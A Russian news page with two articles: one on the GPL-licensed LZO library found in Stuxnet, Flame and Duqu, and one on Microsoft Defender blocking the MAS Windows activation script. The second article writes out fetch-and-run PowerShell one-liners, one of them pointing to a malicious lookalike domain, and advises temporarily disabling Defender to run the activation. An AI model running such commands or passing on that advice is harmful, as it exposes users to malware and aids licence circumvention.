Stuxnet, Flame и Duqu использовали GPL-код

Stuxnet, Flame и Duqu использовали GPL-код

Stuxnet, Flame и Duqu — три самые известные программы, предположительно созданные спецслужбами в качестве «кибеоружия» против других стран. Программа Stuxnet успешно вывела из строя 80% иранских центрифуг по обогащению урана, а шпионская программа Flame несколько лет скрытно работала на иранских компьютерах, установившись как обновление Windows.

На прошлой неделе предположения об американском заказе подтвердились: выяснилось, что президент Обама лично следил за внедрением вируса Stuxnet на иранские компьютеры. Насчёт Flame и Duqu прямых доказательств пока нет. Но вряд ли приходится сомневаться, что эти программы тоже созданы по заказу американцев.

Самое интересное, что во всех трёх программах использовалась библиотека LZO, которая распространяется строго под лицензией GNU GPL.

В программе Flame, кроме LZO, используются и другие проекты Open Source:

putty — лицензия MIT
libbz2 — лицензия типа BSD
zlib — своя лицензия
SQLite — общественное достояние
Lua — лицензия MIT

Как известно, GNU GPL требует распространения с двоичными файлами исходного кода программы или письменного обязательства его предоставить. Именно так и распространяется библиотека LZO. Условия GPL требуют также, что пользователи всех производных программ должны получать такие же права. То есть все производные программы, использующие код GPL, должны распространяться с открытыми исходными кодами или с обязательством их предоставить, сообщает habrahabr.ru.

Очевидно, Stuxnet, Flame и Duqu нарушат лицензию GPL, если авторы этих программ не предоставят свои исходные коды.

Проблема сейчас очень актуальна, потому что лучшие специалисты нескольких антивирусных компаний активно работают над реверс-инжинирингом Flame. Учитывая объём программы (20 мегабайт, сотни тысяч строк кода), это очень непростая задача. Что там говорить, если анализ Duqu продолжается не первый год и ещё далёк от завершения: специалистам «Лаборатории Касперского» только при помощи сообщества недавно удалось понять, на каком языке программирования написан фреймворк.

Венгерская компания CrySyS, которая первой обнаружила Flame, тоже до сих пор работает над анализом Duqu. Она опубликовала обращение к авторам программы Duqu выслать исходные коды на адрес duqusubmit@crysys.hu. Они обязаны сделать это по условиям лицензии, пусть даже анонимно.

Конечно, это скорее шутка. Но кто знает, может быть Фонд электронных рубежей или кто-нибудь другой, кто занимается судебной защитой проектов GPL, когда-нибудь подаст жалобу на американское правительство за нарушение авторского права.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru